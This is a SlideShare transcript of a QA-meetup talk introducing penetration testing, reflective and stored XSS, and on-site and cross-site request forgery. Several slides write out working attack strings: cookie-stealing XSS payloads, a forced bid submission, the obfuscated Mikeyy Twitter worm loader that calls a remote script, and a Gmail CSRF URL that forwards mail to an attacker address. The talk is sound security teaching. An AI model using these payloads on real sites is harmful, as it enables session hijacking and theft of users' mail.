VodQA3_PenetrationTesting_AmitDhakkad
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

VodQA3_PenetrationTesting_AmitDhakkad

on

  • 773 views

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

Statistics

Views

Total Views
773
Views on SlideShare
773
Embed Views
0

Actions

Likes
0
Downloads
3
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

VodQA3_PenetrationTesting_AmitDhakkad Presentation Transcript

  • 1. AmitDhakad
    Application Developer
    Is considered a “survivor”
    Likes To Read About Black Magic & Illusions
  • 2. What, why and how’s ofPenetration Testing
    - AmitDhakad
    Developer
  • 3. What do I plan to cover?
    What is Penetration Testing?
    XSS
    What is it?
    Types of XSS
    Reflective XSS
    Stored XSS
    Request Forgery
    What is it?
    Types of Request Forgery
    On-site request forgery
    Cross-site request forgery
    Demo
    Attack mechanisms
    Real world examples
    Why do we need to pay attention?
  • 4. Penetration Testing
    Simulating a malicious attack on a system
  • 5. Cross-site scripting (XSS)
    Injecting javascript through user-controllable fields
  • 6. Reflective XSS
    Injecting javascript using url parameters
  • 7. Diagram courtesy : The Web Application Hacker’s Handbook
  • 8. Attack:http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
  • 9. Stored XSS
    Exploiting server’s ability to persist
  • 10. Diagram courtesy : The Web Application Hacker’s Handbook
  • 11. Attack:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
  • 12. Request Forgery
    Perform unwitting actions on behalf of the user
  • 13. On-site Request Forgery (OSRF)
    From same domain
  • 14. Attack with XSS:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
  • 15. Attack without XSS:Image url is set to /bids?bid[amount]=500&bid[auction_id]=1
  • 16. Cross-site Request Forgery (CSRF)
    From a different domain
  • 17. Same origin policy
    A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
    A page residing on one domain can load a script from another domain and execute this within its own context.
  • 18. What can you do with XSS and Request Forgery?
    Session hijacking
    Performing arbitrary actions
    Disclosure of user data
  • 19. Real world attacks
  • 20. MySpace worm by Samy (XSS + OSRF)
    Bypassed all filters and added a script to his profile
    The script did two things:
    Added the visiting user as a friend
    The script got copied into the user’s profile
    Anyone visiting the new infected user also got added as Samy’s friend.
  • 21.
    • Protection:
    • 22. MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests
    • 23. Attack:
    • 24. eval('xmlhttp.onread' + 'ystatechange = callback');
  • Ebay – discovered by Dave Armstrong (OSRF)
    Crafted url set as image url
    Arbitrary bid was placed on behalf of the visiting user
  • 25. Mikeyy twitter worm (XSS + OSRF)
    Implemented by a 17-year old boy
    "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
    -- "<script src="http://www.stalkdaily.com/ajax.js"></script>"
    Visiting user got infected
    Infected users began twitting unwittingly.
  • 26. Gmail vulnerability – discovered by PetkoPetkov (CSRF)
    http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
    Add filter to forward all emails to the attacker’s email address
  • 27. Why we need to pay attention?
    Shift is towards attacking clients
    Technologies don’t provide strong protection
    Considered as lame attacks
    Identification using automated tools is difficult
    Penetration testing is considered as a separate vertical
  • 28. Break your own walls before anyone else does it
  • 29. Q & A
  • 30. Thank you